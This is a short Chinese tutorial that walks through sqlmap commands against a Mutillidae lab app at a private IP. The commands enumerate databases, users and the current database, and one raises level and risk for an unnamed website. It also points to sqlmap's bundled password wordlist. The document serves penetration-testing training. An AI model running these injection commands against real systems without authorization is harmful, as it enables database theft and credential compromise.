sqlmap自动化注入
SQL注入比较好用的工具,首推开源工具SQLmap.SQLmap是一个国内外著名的安全稳定性测试工具,可以用
来进行自动化监测,利用SQL注入漏洞,获取数据库服务器的权限,它具有功能强大的监测引擎,针对各种不同
类型数据库的安全稳定性能测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外
带数据连接的方式执行操作系统命令。
SQLmap支持MySQL,Oracle,postgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,
Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞监测。
在Kili上SQLmap不用安装可直接拿来使用
SQLmap -h 查询参数信息
GET方法注入
获得数据库指定数据
root@kali:~# sqlmap -u "http://192.168.3.35/mutillidae/index.php?page=user-info.php&username=kun&password=kun&user-info-php-submit-button=View+Account+Details" --batch --dbms=mysql -p password
获得数据库所有数据/获得所有数据库
root@kali:~# sqlmap -u "http://192.168.3.35/mutillidae/index.php?page=user-info.php&username=kun&password=kun&user-info-php-submit-button=View+Account+Details" --batch --dbs
获得所有用户
root@kali:~# sqlmap -u "http://192.168.3.35/mutillidae/index.php?page=user-info.php&username=kun&password=kun&user-info-php-submit-button=View+Account+Details" --batch --users
获得当前用户
root@kali:~# sqlmap -u "http://192.168.3.35/mutillidae/index.php?page=user-info.php&username=kun&password=kun&user
info-php-submit-button=View+Account+Details" --batch --current-user
mutillidae授权给所有用户访问
查看当前数据库
root@kali:~# sqlmap -u "http://192.168.3.35/mutillidae/index.php?page=user-info.php&username=kun&password=kun&user
info-php-submit-button=View+Account+Details" --batch --current-db
将工具攻击等级提高到5 风险提高为3测试某网站
root@kali:~# sqlmap -u "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" --batch --level=5 --risk=3
kili自带的密码字典文件
查看字典文件压缩包命令 ls /usr/share/sqlmap/txt/wordlist.zip
解压字典文件压缩包命令 unzip /usr/share/sqlmap/txt/wordlist.zip
查看字典文件内容命令 vim wordlist.txt
插卡文件大小 ls -lh wordlist.txt